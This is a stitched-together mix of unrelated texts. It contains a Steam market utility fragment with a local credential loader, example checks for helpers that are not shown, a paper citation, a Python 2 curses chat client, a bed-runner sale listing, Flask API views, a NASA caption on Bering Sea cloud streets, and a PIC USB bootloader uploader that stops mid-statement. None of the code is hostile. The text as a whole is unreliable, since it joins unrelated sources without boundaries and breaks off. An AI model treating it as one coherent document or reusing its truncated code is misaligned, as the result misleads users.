= {} for order in buy_orders_raw: qnt_price_raw = order.select("span[class=market_listing_price]")[0].text.split("@") order = { "order_id": order.attrs["id"].replace("mybuyorder_", ""), "quantity": int(qnt_price_raw[0].strip()), "price": qnt_price_raw[1].strip(), "item_name": order.a.text } buy_orders_dict[order["order_id"]] = order return buy_orders_dict def get_listing_id_to_assets_address_from_html(html: str) -> dict: listing_id_to_assets_address = {} regex = "CreateItemHoverFromContainer\( [\w]+, 'mylisting_([\d]+)_[\w]+', ([\d]+), '([\d]+)', '([\d]+)', [\d]+ \);" for match in re.findall(regex, html): listing_id_to_assets_address[match[0]] = [str(match[1]), match[2], match[3]] return listing_id_to_assets_address def get_description_key(item: dict) -> str: return item['classid'] + '_' + item['instanceid'] def get_key_value_from_url(url: str, key: str, case_sensitive: bool=True) -> str: params = urlparse.urlparse(url).query if case_sensitive: return urlparse.parse_qs(params)[key][0] else: return CaseInsensitiveDict(urlparse.parse_qs(params))[key][0] def load_credentials(): dirname = os.path.dirname(os.path.abspath(__file__)) with open(dirname + '/../secrets/credentials.pwd', 'r') as f: return [Credentials(line.split()[0], line.split()[1], line.split()[2]) for line in f] class Credentials: def __init__(self, login: str, password: str, api_key: str): self.login = login self.password = password self.api_key = api_key
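A few quick, self-contained checks of the helpers above, assuming the module is importable (it appears to live at `steampy/utils.py`); the inputs are invented and the Steam ID values follow from the 0x1100001 prefix used in `account_id_to_steam_id()`.

```python
# from steampy.utils import (text_between, parse_price,
#                            account_id_to_steam_id, steam_id_to_account_id)

print(text_between("classinfo/12345/67890?l=english", "classinfo/", "?"))
# -> "12345/67890"
print(parse_price("$19.99"))                          # -> Decimal('19.99')
print(account_id_to_steam_id("1"))                    # -> "76561197960265729"
print(steam_id_to_account_id("76561197960265729"))    # -> "1"
```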
Baird, Mark E., Adams, Matthew P., Babcock, Russell C., Oubelkheir, Kadija, Mongin, Mathieu, Wild-Allen, Karen A., Skerratt, Jennifer, Robson, Barbara J., Petrou, Katherina, Ralph, Peter J., O'Brien, Katherine R., Carter, Alex B., Jarvis, Jessie C., and Rasheed, Michael A. (2016) A biophysical representation of seagrass growth for application in a complex shallow-water biogeochemical model. Ecological Modelling, 325. pp. 13-27.
import socket import sys from thread import start_new_thread from chatClasses import tcpHandler import time import curses screen = curses.initscr() screen.immedok(True) curses.noecho() curses.curs_set(0) curses.cbreak() screen.keypad(1) listenerPort = 5006 promoterPort = 5005 server_address = "127.0.0.1" chat2Write = [] log2Write = [] Xmessages = [] debug = 80 tosend = "" closing = False sending = False disconnecting = False listenerConnection = None promoterConnection = None uuid = "" def handleData(data): log(data, 0) return def log(logMsg, verbosity = 0): global log2Write if (verbosity < debug): log2Write.append("[" + str(verbosity) + "]: " + logMsg) if (verbosity <= 5): chat2Write.append(logMsg) def connectSocket(_type, server_address, port): # Create a TCP/IP socket sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) # Connect to server try: sock.connect((server_address, port)) log("starting up on %s port %s _ " % sock.getsockname() + _type, 2) except socket.error, msg: log(_type + " : Connect Failed. Error Code: {} Error: {}".format(str(msg[0]), msg[1]), 2) sys.exit() return sock def startListener(address, port): global disconnecting log("startung listener", 120) connection = connectSocket("listener", address, port) tcp = tcpHandler(connection) global listenerConnection global uuid listenerConnection = connection data = str(uuid) tcp.write(data) while True: try: data, length = tcp.listen() log(address + ": '%s'" % data, 20) if data: handleData(data) else: log(address + ": connection closed _ listener", 2) break except socket.error, msg: if '[Errno 32] Broken pipe' in str(msg): log(address + ": connection closed _ listener", 2) else: log(address + ": '%s'" % msg + " _ listener", 2) break uuid = "" disconnecting = True def startPromoter(address, port): global disconnecting global sending global tosend global uuid connection = connectSocket("promoter", address, port) tcp = tcpHandler(connection) global promoterConnection promoterConnection = connection uuid, length = tcp.listen() log(str(uuid) + " | " + str(length), 40) while not disconnecting: if sending: if tosend != "": log("want to send: " + tosend, 120) log(tcp.write(tosend), 120) tosend = "" sending = False uuid = "" connection.close() log(address + ": connection closed _ promoter", 2) def write2Box(box, messageList, lastLength, maxLines): empty = "" for i in range(1,99): empty += " " logLength = len(messageList) tempWrite = messageList if logLength > lastLength: if logLength < maxLines: maxim = logLength else: maxim = maxLines i = 0 while i < maxim: box.addstr(i+1, 1, empty) box.addstr(i+1, 1, tempWrite[logLength - i - 1]) i += 1 return logLength, box box.refresh() else: return lastLength, box def printScreen(): global tosend global screen global log2Write empty = "" for i in range(1,99): empty += " " logLength = 0 chatLength = 0 lastToSendLength = 0 screen.clear() chatbox = curses.newwin(22, 120, 0, 0) chatbox.box() chatbox.refresh() sendbox = curses.newwin(3, 120, 23, 0) sendbox.box() sendbox.refresh() logbox = curses.newwin(35, 120, 27, 0) logbox.box() logbox.refresh() screen.addstr(63, 1, "F5 - (re)connect") screen.addstr(" | END - close") screen.addstr(64, 1, "F6 - disconnect") while True: logLength, box = write2Box(logbox, log2Write, logLength, 35) box.refresh() chatLength, box = write2Box(chatbox, chat2Write, chatLength, 20) box.refresh() lengthToSend = len(tosend) if lengthToSend <> lastToSendLength: lastToSendLength = lengthToSend sendbox.addstr(1, 1, empty) sendbox.addstr(1, 1, tosend) sendbox.refresh() 
screen.refresh() def checkKeyboard(): global tosend global closing global sending global screen global disconnecting global listenerConnection key = '' while not closing: key = screen.getch() if key == curses.KEY_END: closing = True elif key == ord('\n'): sending = True elif key == curses.KEY_BACKSPACE: tosend = tosend[:-1] elif key == curses.KEY_F5: connect() elif key == curses.KEY_F6: disconnecting = True log("connection closed _ listener", 2) elif key <= 256: tosend += chr(key) def connect(): global server_address global promoterPort global listenerPort global uuid global disconnecting disconnecting = False start_new_thread(startPromoter, (server_address, promoterPort,)) while uuid == "": time.sleep(1) log("connect with uuid: " + str(uuid), 20) log("prepare listener start", 120) start_new_thread(startListener, (server_address, listenerPort,)) def Main(): global closing global tosend global uuid global listenerConnection global promoterConnection start_new_thread(printScreen, ()) start_new_thread(checkKeyboard, ()) connect() while not closing: pass time.sleep(1) listenerConnection.close() promoterConnection.close() curses.endwin() Main()
This listing is for a fabulous cream-colored, floral-designed bed runner. It could also be used as a couch runner or even a shawl. It is in great condition, with just a few areas of discoloration that are not really noticeable. Overall there are no tears or mis-stitching, and it has the original personalized tag on the back. A great piece to own! Delivered quickly! It will be a perfect wedding gift. Thank you!
import os import logging from time import time from apikit import jsonify from flask import render_template, current_app, Blueprint, request from jsonschema import ValidationError from elasticsearch import TransportError from aleph.core import get_config from aleph.model.constants import CORE_FACETS, SOURCE_CATEGORIES from aleph.model.constants import COUNTRY_NAMES, LANGUAGE_NAMES from aleph.model.validation import resolver from aleph.views.cache import enable_cache blueprint = Blueprint('base_api', __name__) log = logging.getLogger(__name__) def angular_templates(): templates = {} template_dirs = [current_app.static_folder] template_dirs.extend(get_config('CUSTOM_TEMPLATES_DIR')) for template_dir in template_dirs: for tmpl_set in ['templates', 'help']: tmpl_dir = os.path.join(template_dir, tmpl_set) for (root, dirs, files) in os.walk(tmpl_dir): for file_name in files: file_path = os.path.join(root, file_name) with open(file_path, 'rb') as fh: file_name = file_path[len(template_dir) + 1:] templates[file_name] = fh.read().decode('utf-8') return templates.items() @blueprint.route('/search') @blueprint.route('/help') @blueprint.route('/help/<path:path>') @blueprint.route('/entities') @blueprint.route('/entities/<path:path>') @blueprint.route('/crawlers') @blueprint.route('/crawlers/logs') @blueprint.route('/tabular/<path:path>') @blueprint.route('/text/<path:path>') @blueprint.route('/') def ui(**kwargs): enable_cache(server_side=True) return render_template("layout.html", templates=angular_templates()) @blueprint.route('/api/1/metadata') def metadata(): enable_cache(server_side=False) schemata = {} for schema_id, schema in resolver.store.items(): if not schema_id.endswith('#'): schema_id = schema_id + '#' schemata[schema_id] = { 'id': schema_id, 'title': schema.get('title'), 'faIcon': schema.get('faIcon'), 'plural': schema.get('plural', schema.get('title')), 'description': schema.get('description'), 'inline': schema.get('inline', False) } return jsonify({ 'status': 'ok', 'fields': CORE_FACETS, 'source_categories': SOURCE_CATEGORIES, 'countries': COUNTRY_NAMES, 'languages': LANGUAGE_NAMES, 'schemata': schemata }) @blueprint.app_errorhandler(403) def handle_authz_error(err): return jsonify({ 'status': 'error', 'message': 'You are not authorized to do this.', 'roles': request.auth_roles, 'user': request.auth_role }, status=403) @blueprint.app_errorhandler(ValidationError) def handle_validation_error(err): return jsonify({ 'status': 'error', 'message': err.message }, status=400) @blueprint.app_errorhandler(TransportError) def handle_es_error(err): return jsonify({ 'status': 'error', 'message': err.error, 'info': err.info.get('error', {}).get('root_cause', [])[-1] }, status=400)
Ice, wind, cold temperatures and ocean waters combined to create dramatic cloud formations over the Bering Sea in late January 2015. The Moderate Resolution Imaging Spectroradiometer (MODIS) aboard NASA's Aqua satellite passed over the region and captured this true-color image on Jan. 23.

The frozen tundra of Russia lies in the northwest of the image, and snow-covered Alaska lies in the northeast. Sea ice extends from the land well into the Bering Sea. Over the dark water, bright white clouds line up in close, parallel rows. These formations are known as "cloud streets". Air blowing over the cold, snowy land and then over ice becomes both cold and dry. When that air then moves over relatively warmer and much moister water, parallel cylinders of spinning air can develop. On the upper edge of these cylinders, where the air is rising, small clouds form. Where air is descending, the skies are clear. This clear/cloudy pattern, formed in parallel rows, gives the impression of streets.

The clouds begin over the sea ice, but they primarily hang over open ocean. The streets are neat and in tight rows closest to land, while further over the Bering Sea the pattern widens and begins to become more random. The rows of clouds are also not perfectly straight, but tend to curve. The strength and direction of the wind help create these features: where the wind is strongest, nearest to shore, the clouds line up most neatly. The clouds align with the wind direction, so the direction of the streets gives strong clues to the prevailing wind direction.
#!/usr/bin/env python #-*- coding: iso-8859-15 -*- """--------------------------------------------------------------------- _____ _____ _ _ _____ _ _ _____ _ _ ____ | __ \_ _| \ | |/ ____| | | |_ _| \ | |/ __ \ | |__) || | | \| | | __| | | | | | | \| | | | | | ___/ | | | . ` | | |_ | | | | | | | . ` | | | | | | _| |_| |\ | |__| | |__| |_| |_| |\ | |__| | |_| _|_____|_| \_|\_____|\____/|_____|_| \_|\____/ | | | | | | ___| |_ __ _ _ __ __| | __ _| | ___ _ __ ___ / __| __/ _` | '_ \ / _` |/ _` | |/ _ \| '_ \ / _ \ \__ \ || (_| | | | | (_| | (_| | | (_) | | | | __/ |___/\__\__,_|_| |_|\__,_|\__,_|_|\___/|_| |_|\___| ___ _ _ _ _ _ _ _ / _ \ | | (_) | | | | | | | | | | (_) |_____| |__ _| |_ | | | |_ __ | | ___ __ _ __| | ___ _ __ > _ <______| '_ \| | __| | | | | '_ \| |/ _ \ / _` |/ _` |/ _ \ '__| | (_) | | |_) | | |_ | |__| | |_) | | (_) | (_| | (_| | __/ | \___/ |_.__/|_|\__| \____/| .__/|_|\___/ \__,_|\__,_|\___|_| | | |_| Author: Regis Blanchot <[email protected]> -------------------------------------------------------------------- 2013-11-13 - RB - first release 2015-09-08 - RB - fixed numBlocks > numBlocksMax when used with XC8 2016-08-27 - RB - added PIC16F145x support 2016-08-28 - RB - added Python3 support 2016-08-29 - RB - added usb.core functions (PYUSB_USE_CORE) 2016-11-23 - RB - changed constant writeBlockSize to variable writeBlockSize -------------------------------------------------------------------- This library is free software you can redistribute it and/or modify it under the terms of the GNU Lesser General Public License as published by the Free Software Foundation; either version 2.1 of the License, or (at your option) any later version. This library is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU Lesser General Public License for more details. You should have received a copy of the GNU Lesser General Public License along with this library; if not, write to the Free Software Foundation, Inc. 51 Franklin Street, Fifth Floor Boston, MA 02110-1301 USA ---------------------------------------------------------------------""" #----------------------------------------------------------------------- # Usage: uploader8.py mcu path/filename.hex # Ex : uploader8.py 16F1459 tools/Blink1459.hex #----------------------------------------------------------------------- # This class is based on : # - Diolan USB bootloader licenced (LGPL) by Diolan <http://www.diolan.com> # - jallib USB bootloader licenced (BSD) by Albert Faber # See also PyUSB Doc. 
http://wiki.erazor-zone.de/wiki:projects:python:pyusb:pydoc # Pinguino Device Descriptors : lsusb -v -d 04d8:feaa #----------------------------------------------------------------------- # Debug: export PYUSB_DEBUG=debug #----------------------------------------------------------------------- import sys import os import usb #import usb.core #import usb.util # PyUSB Core module switch #----------------------------------------------------------------------- PYUSB_USE_CORE = 1 # 0=legacy, 1=core # Globales #----------------------------------------------------------------------- # 8-bit Pinguino's ID #----------------------------------------------------------------------- VENDOR_ID = 0x04D8 # Microchip License PRODUCT_ID = 0xFEAA # Pinguino Sub-License # Hex format record types #----------------------------------------------------------------------- Data_Record = 0 End_Of_File_Record = 1 Extended_Segment_Address_Record = 2 Start_Segment_Address_Record = 3 Extended_Linear_Address_Record = 4 Start_Linear_Address_Record = 5 # usbBuf Data Packet Structure #----------------------------------------------------------------------- # __________________ # | COMMAND | 0 [BOOT_CMD] # | LEN/SIZE | 1 [BOOT_CMD_LEN] or [BOOT_SIZE] # | ADDRL | 2 [BOOT_ADDR_LO] or [BOOT_VER_MINOR] # | ADDRH | 3 [BOOT_ADDR_HI] or [BOOT_VER_MAJOR ] # | ADDRU | 4 [BOOT_ADDR_UP] # | | 5 [BOOT_DATA_START] or [BOOT_DEV1] or [BOOT_REV1] # | | 6 [BOOT_DEV2] or [BOOT_REV2] # . . # . DATA . # . . # | | 62 # |________________| 63 # #----------------------------------------------------------------------- BOOT_CMD = 0 BOOT_CMD_LEN = 1 BOOT_ADDR_LO = 2 BOOT_ADDR_HI = 3 BOOT_ADDR_UP = 4 BOOT_DATA_START = 5 BOOT_SIZE = 1 BOOT_VER_MINOR = 2 BOOT_VER_MAJOR = 3 BOOT_REV1 = 5 BOOT_REV2 = 6 BOOT_DEV1 = 7 BOOT_DEV2 = 8 # Bootloader commands #----------------------------------------------------------------------- READ_VERSION_CMD = 0x00 READ_FLASH_CMD = 0x01 WRITE_FLASH_CMD = 0x02 ERASE_FLASH_CMD = 0x03 #READ_EEDATA_CMD = 0x04 #WRITE_EEDATA_CMD = 0x05 #READ_CONFIG_CMD = 0x06 #WRITE_CONFIG_CMD = 0x07 RESET_CMD = 0xFF # USB Max. 
Packet size #----------------------------------------------------------------------- MAXPACKETSIZE = 64 # Bulk endpoints #----------------------------------------------------------------------- IN_EP = 0x81 # endpoint for Bulk reads OUT_EP = 0x01 # endpoint for Bulk writes # Configuration #----------------------------------------------------------------------- ACTIVE_CONFIG = 0x01 INTERFACE_ID = 0x00 TIMEOUT = 10000 # Error codes returned by various functions #----------------------------------------------------------------------- ERR_NONE = 0 ERR_CMD_ARG = 1 ERR_CMD_UNKNOWN = 2 ERR_DEVICE_NOT_FOUND = 3 ERR_USB_INIT1 = 4 ERR_USB_INIT2 = 5 ERR_USB_OPEN = 6 ERR_USB_WRITE = 7 ERR_USB_READ = 8 ERR_HEX_OPEN = 9 ERR_HEX_STAT = 10 ERR_HEX_MMAP = 11 ERR_HEX_SYNTAX = 12 ERR_HEX_CHECKSUM = 13 ERR_HEX_RECORD = 14 ERR_VERIFY = 15 ERR_EOL = 16 ERR_USB_ERASE = 17 # Table with supported USB devices # device_id:[PIC name, flash size(in bytes), eeprom size (in bytes)] #----------------------------------------------------------------------- devices_table = \ { # 16F 0x3020: ['16f1454' , 0x02000, 0x00 ], 0x3021: ['16f1455' , 0x02000, 0x00 ], 0x3023: ['16f1459' , 0x02000, 0x00 ], 0x3024: ['16lf1454' , 0x02000, 0x00 ], 0x3025: ['16lf1455' , 0x02000, 0x00 ], 0x3027: ['16lf1459' , 0x02000, 0x00 ], # 18F 0x4740: ['18f13k50' , 0x02000, 0x80 ], 0x4700: ['18lf13k50' , 0x02000, 0x80 ], 0x4760: ['18f14k50' , 0x04000, 0xff ], 0x4720: ['18f14k50' , 0x04000, 0xff ], 0x2420: ['18f2450' , 0x04000, 0x00 ], 0x1260: ['18f2455' , 0x06000, 0xff ], 0x2a60: ['18f2458' , 0x06000, 0xff ], 0x4c00: ['18f24j50' , 0x04000, 0x00 ], 0x4cc0: ['18lf24j50' , 0x04000, 0x00 ], 0x1240: ['18f2550' , 0x08000, 0xff ], 0x2a40: ['18f2553' , 0x08000, 0xff ], 0x4c20: ['18f25j50' , 0x08000, 0x00 ], 0x4ce0: ['18lf25j50' , 0x08000, 0x00 ], 0x5c20: ['18f25k50' , 0x08000, 0xff ], 0x5ca0: ['18lf25k50' , 0x08000, 0xff ], 0x4c40: ['18f26j50' , 0x10000, 0x00 ], 0x4d00: ['18lf26j50' , 0x10000, 0x00 ], 0x5860: ['18f27j53' , 0x20000, 0x00 ], 0x1200: ['18f4450' , 0x04000, 0x00 ], 0x1220: ['18f4455' , 0x06000, 0x00 ], 0x2a20: ['18f4458' , 0x06000, 0xff ], 0x4c60: ['18f44j50' , 0x04000, 0x00 ], 0x4d20: ['18lf44j50' , 0x04000, 0x00 ], 0x1200: ['18f4550' , 0x08000, 0xff ], 0x2a00: ['18f4553' , 0x08000, 0xff ], 0x4c80: ['18f45j50' , 0x08000, 0x00 ], 0x4d40: ['18lf45j50' , 0x08000, 0x00 ], 0x5C00: ['18f45k50' , 0x08000, 0xff ], 0x5C80: ['18lf45k50' , 0x08000, 0xff ], 0x4ca0: ['18f46j50' , 0x10000, 0x00 ], 0x4d60: ['18f46j50' , 0x10000, 0x00 ], 0x58e0: ['18f47j53' , 0x20000, 0x00 ], 0x4100: ['18f65j50' , 0x08000, 0x00 ], 0x1560: ['18f66j50' , 0x10000, 0x00 ], 0x4160: ['18f66j55' , 0x18000, 0x00 ], 0x4180: ['18f67j50' , 0x20000, 0x00 ], 0x41a0: ['18f85j50' , 0x08000, 0x00 ], 0x41e0: ['18f86j50' , 0x10000, 0x00 ], 0x1f40: ['18f86j55' , 0x18000, 0x00 ], 0x4220: ['18f87j50' , 0x20000, 0x00 ] } # ---------------------------------------------------------------------- def getDevice(vendor, product): # ---------------------------------------------------------------------- """ search USB device and returns a DeviceHandle object """ if PYUSB_USE_CORE: device = usb.core.find(idVendor=vendor, idProduct=product) #print(device) if device is None : return ERR_DEVICE_NOT_FOUND else : return device else: busses = usb.busses() for bus in busses: #print(bus) for device in bus.devices: #print(device) if (device.idVendor, device.idProduct) == (vendor, product): return device return ERR_DEVICE_NOT_FOUND # ---------------------------------------------------------------------- def 
initDevice(device): # ---------------------------------------------------------------------- """ init pinguino device """ if PYUSB_USE_CORE: if os.getenv("PINGUINO_OS_NAME") == "linux": try: active = device.is_kernel_driver_active(INTERFACE_ID) except usb.core.USBError as e: sys.exit("Aborting: could not detach kernel driver: %s" % str(e)) if active : #print("Kernel driver detached") try: device.detach_kernel_driver(INTERFACE_ID) except usb.core.USBError as e: sys.exit("Aborting: could not detach kernel driver: %s" % str(e)) #else: #print("No kernel driver attached") # The call to set_configuration must come before # claim_interface (which, btw, is optional). try: device.set_configuration(ACTIVE_CONFIG) except usb.core.USBError as e: sys.exit("Aborting: could not set configuration: %s" % str(e)) try: usb.util.claim_interface(device, INTERFACE_ID) except usb.core.USBError as e: sys.exit("Aborting: could not claim interface: %s" % str(e)) return device else: handle = device.open() if handle: #print(handle) try: handle.detachKernelDriver(INTERFACE_ID) except: #print("Could not detatch kernel driver from interface") pass try: handle.setConfiguration(ACTIVE_CONFIG) except: sys.exit("Aborting: could not set configuration") try: handle.claimInterface(INTERFACE_ID) except: #print("Could not claim interface") pass return handle return ERR_USB_INIT1 # ---------------------------------------------------------------------- def closeDevice(handle): # ---------------------------------------------------------------------- """ Close currently-open USB device """ if PYUSB_USE_CORE: usb.util.release_interface(handle, INTERFACE_ID) else: handle.releaseInterface() # ---------------------------------------------------------------------- def sendCommand(handle, usbBuf): # ---------------------------------------------------------------------- """ send command to the bootloader """ if PYUSB_USE_CORE: sent_bytes = handle.write(OUT_EP, usbBuf, TIMEOUT) else: sent_bytes = handle.bulkWrite(OUT_EP, usbBuf, TIMEOUT) if sent_bytes != len(usbBuf): return ERR_USB_WRITE if PYUSB_USE_CORE: return handle.read(IN_EP, MAXPACKETSIZE, TIMEOUT) else: return handle.bulkRead(IN_EP, MAXPACKETSIZE, TIMEOUT) # ---------------------------------------------------------------------- def resetDevice(handle): # ---------------------------------------------------------------------- """ send reset command to the bootloader """ usbBuf = [0] * MAXPACKETSIZE # command code usbBuf[BOOT_CMD] = RESET_CMD # write data packet if PYUSB_USE_CORE: handle.write(OUT_EP, usbBuf, TIMEOUT) else: handle.bulkWrite(OUT_EP, usbBuf, TIMEOUT) #usbBuf = sendCommand(handle, usbBuf) #print usbBuf #handle.reset() # ---------------------------------------------------------------------- def getVersion(handle): # ---------------------------------------------------------------------- """ get bootloader version """ usbBuf = [0] * MAXPACKETSIZE # command code usbBuf[BOOT_CMD] = READ_VERSION_CMD # write data packet and get response usbBuf = sendCommand(handle, usbBuf) if usbBuf == ERR_USB_WRITE: return ERR_USB_WRITE else: # major.minor return str(usbBuf[BOOT_VER_MAJOR]) + "." 
+ \ str(usbBuf[BOOT_VER_MINOR]) # ---------------------------------------------------------------------- def getDeviceID(handle, proc): # ---------------------------------------------------------------------- """ read 2-byte device ID from PIC18F : 0x3FFFFE PIC16F : 0x8005 """ #print(proc) if ("16f" in proc): # REVISION & DEVICE ID usbBuf = readFlash(handle, 0x8005, 4) if usbBuf == ERR_USB_WRITE or usbBuf is None: return ERR_USB_WRITE, ERR_USB_WRITE rev1 = usbBuf[BOOT_REV1] rev2 = usbBuf[BOOT_REV2] device_rev = (int(rev2) << 8) + int(rev1) dev1 = usbBuf[BOOT_DEV1] dev2 = usbBuf[BOOT_DEV2] device_id = (int(dev2) << 8) + int(dev1) else: # REVISION & DEVICE ID usbBuf = readFlash(handle, 0x3FFFFE, 2) #print usbBuf if usbBuf == ERR_USB_WRITE or usbBuf is None: return ERR_USB_WRITE, ERR_USB_WRITE #print("BUFFER =", usbBuf dev1 = usbBuf[BOOT_REV1] #print("DEV1 =", dev1 dev2 = usbBuf[BOOT_REV2] #print("DEV2 =", dev2 device_id = (int(dev2) << 8) + int(dev1) device_id = device_id & 0xFFE0 #print device_id device_rev = device_id & 0x001F #print device_rev return device_id, device_rev # ---------------------------------------------------------------------- def getDeviceFlash(device_id): # ---------------------------------------------------------------------- """ get flash memory info """ for n in devices_table: if n == device_id: return devices_table[n][1] return ERR_DEVICE_NOT_FOUND # ---------------------------------------------------------------------- def getDeviceName(device_id): # ---------------------------------------------------------------------- """ get device chip name """ for n in devices_table: if n == device_id: return devices_table[n][0] return ERR_DEVICE_NOT_FOUND # ---------------------------------------------------------------------- def eraseFlash(handle, address, numBlocks): # ---------------------------------------------------------------------- """ erase n * 64- or 1024-byte blocks of flash memory """ usbBuf = [0] * MAXPACKETSIZE # command code usbBuf[BOOT_CMD] = ERASE_FLASH_CMD # number of blocks to erase usbBuf[BOOT_SIZE] = numBlocks # 1rst block address # NB : must be divisible by 64 or 1024 depending on PIC model usbBuf[BOOT_ADDR_LO] = (address ) & 0xFF usbBuf[BOOT_ADDR_HI] = (address >> 8 ) & 0xFF usbBuf[BOOT_ADDR_UP] = (address >> 16) & 0xFF # write data packet if PYUSB_USE_CORE: handle.write(OUT_EP, usbBuf, TIMEOUT) else: handle.bulkWrite(OUT_EP, usbBuf, TIMEOUT) #return sendCommand(handle, usbBuf) # ---------------------------------------------------------------------- def readFlash(handle, address, length): # ---------------------------------------------------------------------- """ read a block of flash """ usbBuf = [0] * MAXPACKETSIZE # command code usbBuf[BOOT_CMD] = READ_FLASH_CMD # size of block usbBuf[BOOT_CMD_LEN] = length # address usbBuf[BOOT_ADDR_LO] = (address ) & 0xFF usbBuf[BOOT_ADDR_HI] = (address >> 8 ) & 0xFF usbBuf[BOOT_ADDR_UP] = (address >> 16) & 0xFF # send request to the bootloader return sendCommand(handle, usbBuf) # ---------------------------------------------------------------------- def writeFlash(handle, address, datablock): # ---------------------------------------------------------------------- """ write a block of code first 5 bytes are for block description (BOOT_CMD, BOOT_CMD_LEN and BOOT_ADDR) data block size should be of writeBlockSize bytes total length is then writeBlockSize + 5 < MAXPACKETSIZE """ usbBuf = [0xFF] * MAXPACKETSIZE # command code usbBuf[BOOT_CMD] = WRITE_FLASH_CMD # size of block usbBuf[BOOT_CMD_LEN] = len(datablock) # 
block's address usbBuf[BOOT_ADDR_LO] = (address ) & 0xFF usbBuf[BOOT_ADDR_HI] = (address >> 8 ) & 0xFF usbBuf[BOOT_ADDR_UP] = (address >> 16) & 0xFF # add data to the packet #for i in range(len(datablock)): # usbBuf[BOOT_DATA_START + i] = datablock[i] usbBuf[BOOT_DATA_START:] = datablock #print usbBuf # write data packet on usb device if PYUSB_USE_CORE: handle.write(OUT_EP, usbBuf, TIMEOUT) else: handle.bulkWrite(OUT_EP, usbBuf, TIMEOUT) #return sendCommand(handle, usbBuf) # ---------------------------------------------------------------------- def hexWrite(handle, filename, proc, memstart, memend): # ---------------------------------------------------------------------- """ Parse the Hex File Format and send data to usb device [0] Start code, one character, an ASCII colon ':'. [1:3] Byte count, two hex digits. [3:7] Address, four hex digits, a 16-bit address of the beginning of the memory position for the data. Limited to 64 kilobytes, the limit is worked around by specifying higher bits via additional record types. This address is big endian. [7:9] Record type, two hex digits, 00 to 05, defining the type of the data field. [9:*] Data, a sequence of n bytes of the data themselves, represented by 2n hex digits. [*:*] Checksum, two hex digits - the least significant byte of the two's complement of the sum of the values of all fields except fields 1 and 6 (Start code ":" byte and two hex digits of the Checksum). It is calculated by adding together the hex-encoded bytes (hex digit pairs), then leaving only the least significant byte of the result, and making a 2's complement (either by subtracting the byte from 0x100, or inverting it by XOR-ing with 0xFF and adding 0x01). If you are not working with 8-bit variables, you must suppress the overflow by AND-ing the result with 0xFF. The overflow may occur since both 0x100-0 and (0x00 XOR 0xFF)+1 equal 0x100. If the checksum is correctly calculated, adding all the bytes (the Byte count, both bytes in Address, the Record type, each Data byte and the Checksum) together will always result in a value wherein the least significant byte is zero (0x00). 
For example, on :0300300002337A1E 03 + 00 + 30 + 00 + 02 + 33 + 7A = E2, 2's complement is 1E """ # Addresses are doubled in the PIC16F HEX file if ("16f" in proc): memstart = memstart * 2 memend = memend * 2 #print("memstart = 0x%X" % memstart) #print("memend = 0x%X" % memend) data = [] old_max_address = memstart old_min_address = memend max_address = 0 min_address = 0 address_Hi = 0 codesize = 0 # size of write block # ------------------------------------------------------------------ if "13k50" in proc : writeBlockSize = 8 elif "14k50" in proc : writeBlockSize = 16 else : writeBlockSize = 32 # size of erase block # -------------------------------------------------------------- # Pinguino x6j50 or x7j53, erased blocks are 1024-byte long if ("j" in proc): eraseBlockSize = 1024 # Pinguino x455, x550 or x5k50, erased blocks are 64-byte long else: eraseBlockSize = 64 #print("eraseBlockSize = %d" % eraseBlockSize # image of the whole PIC memory (above memstart) # -------------------------------------------------------------- for i in range(memend - memstart): data.append(0xFF) # read hex file # ------------------------------------------------------------------ hexfile = open(filename,'r') lines = hexfile.readlines() hexfile.close() # calculate checksum, code size and memmax # ------------------------------------------------------------------ for line in lines: byte_count = int(line[1:3], 16) # lower 16 bits (bits 0-15) of the data address address_Lo = int(line[3:7], 16) record_type= int(line[7:9], 16) # checksum calculation (optional if speed is critical) end = 9 + byte_count * 2 # position of checksum at end of line checksum = int(line[end:end+2], 16) cs = 0 i = 1 while i < end: cs = cs + (0x100 - int(line[i:i+2], 16) ) & 0xFF # not(i) i = i + 2 if checksum != cs: return ERR_HEX_CHECKSUM # extended linear address record if record_type == Extended_Linear_Address_Record: # upper 16 bits (bits 16-31) of the data address address_Hi = int(line[9:13], 16) << 16 #print address_Hi # data record elif record_type == Data_Record: # data's 32-bit address calculation address = address_Hi + address_Lo #print("address = %X" % address # min address if (address < old_min_address) and (address >= memstart): min_address = address old_min_address = address #print("min. 
address : 0x%X" % old_min_address # max address if (address > old_max_address) and (address < memend): max_address = address + byte_count old_max_address = address #print("end_address = %X" % end_address if (address >= memstart) and (address < memend): # code size calculation codesize = codesize + byte_count # append data for i in range(byte_count): if ((address + i) < memend): #Caution : addresses are not always contiguous #data.append(int(line[9 + (2 * i) : 11 + (2 * i)], 16)) #data[address - memstart + i] = int(line[9 + (2 * i) : 11 + (2 * i)], 16) data[address - min_address + i] = int(line[9 + (2 * i) : 11 + (2 * i)], 16) #print line[9 + (2 * i) : 11 + (2 * i)], # end of file record elif record_type == End_Of_File_Record: break # unsupported record type else: return ERR_HEX_RECORD # max_address must be divisible by eraseBlockSize # ------------------------------------------------------------------ #min_address = min_address - eraseBlockSize - (min_address % eraseBlockSize) max_address = max_address + eraseBlockSize - (max_address % eraseBlockSize) if (max_address > memend): max_address = memend #print("min_address = 0x%X" % min_address #print("max_address = 0x%X" % max_address # erase memory from memstart to max_address # ------------------------------------------------------------------ numBlocksMax = (memend - memstart) / eraseBlockSize numBlocks = (max_address - memstart) / eraseBlockSize #print("memend = %d" % memend #print("memmax = %d" % memmax #print("memstart = %d" % memstart #print("numBlocks = %d" % numBlocks #print("numBlocksMax = %d" % numBlocksMax if numBlocks > numBlocksMax: #numBlocks = numBlocksMax return ERR_USB_ERASE if numBlocks < 256: status = eraseFlash(handle, memstart, numBlocks) if status == ERR_USB_WRITE: return ERR_USB_WRITE else: numBlocks = numBlocks - 255 upperAddress = memstart + 255 * eraseBlockSize # from self.board.memstart to upperAddress status = eraseFlash(handle, memstart, 255) if status == ERR_USB_WRITE: return ERR_USB_WRITE # erase flash memory from upperAddress to memmax status = eraseFlash(handle, upperAddress, numBlocks) if status == ERR_USB_WRITE: return ERR_USB_WRITE # write blocks of writeBlockSize bytes # ------------------------------------------------------------------ for addr8 in range(min_address, max_address, writeBlockSize): index = addr8 - min_address # the addresses are doubled in the PIC16F HEX file if ("16f" in proc): addr16 = addr8 / 2 status = writeFlash(handle, addr16, data[index:index+writeBlockSize]) if status == ERR_USB_WRITE: return ERR_USB_WRITE #print("addr8=0x%X addr16=0x%X" % 